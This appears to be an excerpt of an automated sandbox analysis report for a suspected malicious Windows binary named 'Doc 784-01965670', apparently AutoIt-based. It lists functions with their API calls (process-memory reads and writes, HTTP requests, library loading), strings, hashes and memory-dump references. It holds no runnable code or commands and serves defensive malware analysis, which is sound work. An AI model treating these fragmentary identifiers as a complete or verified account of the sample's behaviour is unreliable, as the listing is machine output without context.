                                                                                                                                    • String ID: '$[$h
                                                                                                                                    • API String ID: 2931989736-1224472061
                                                                                                                                    • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                    • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                                    • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                    • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                                    Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strncmp
                                                                                                                                    • String ID: >$R$U
                                                                                                                                    • API String ID: 909875538-1924298640
                                                                                                                                    • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                    • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                                    • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                    • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                                    Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                                    • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                                    • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                    • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                    • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                                    • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                    • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                                    Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                    • API String ID: 176396367-557222456
                                                                                                                                    • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                    • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                                    • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                    • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                                    Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                    • String ID: 4RH
                                                                                                                                    • API String ID: 2981388473-749298218
                                                                                                                                    • Opcode ID: 729bbe064e017370016cbbe449625b34bf86d2465771c793fde470bd13ce78dc
                                                                                                                                    • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                                    • Opcode Fuzzy Hash: 729bbe064e017370016cbbe449625b34bf86d2465771c793fde470bd13ce78dc
                                                                                                                                    • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                                    Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                    • String ID: LPT$HH
                                                                                                                                    • API String ID: 3035604524-2728063697
                                                                                                                                    • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                                                    • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                                    • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                                                    • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                                    Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                                      • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 4055202900-2766056989
                                                                                                                                    • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                    • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                                    • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                    • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                                    Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CrackInternet_memset_wcslen
                                                                                                                                    • String ID: |
                                                                                                                                    • API String ID: 915713708-2343686810
                                                                                                                                    • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                    • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                                    • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                    • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                                    Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                                    • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3705125965-3916222277
                                                                                                                                    • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                    • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                                    • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                    • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                                    Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long
                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                    • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                    • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                                    • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                    • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                                    Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                    • String ID: AU3_GetPluginDetails
                                                                                                                                    • API String ID: 145871493-4132174516
                                                                                                                                    • Opcode ID: 4d29db7c409dc1d8665f13fcd2a771d904d38d92e5d57695c8085be3ce6f429e
                                                                                                                                    • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                                    • Opcode Fuzzy Hash: 4d29db7c409dc1d8665f13fcd2a771d904d38d92e5d57695c8085be3ce6f429e
                                                                                                                                    • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                                    Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DestroyWindow
                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                    • API String ID: 3375834691-2298589950
                                                                                                                                    • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                    • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                                    • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                    • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                                    Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                                    • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                    • String ID: Listbox
                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                    • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                    • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                                    • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                    • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                                    Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 2507767853-2761332787
                                                                                                                                    • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                    • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                                    • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                    • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                                    Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 2507767853-2761332787
                                                                                                                                    • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                    • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                    • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                    • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                                    Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
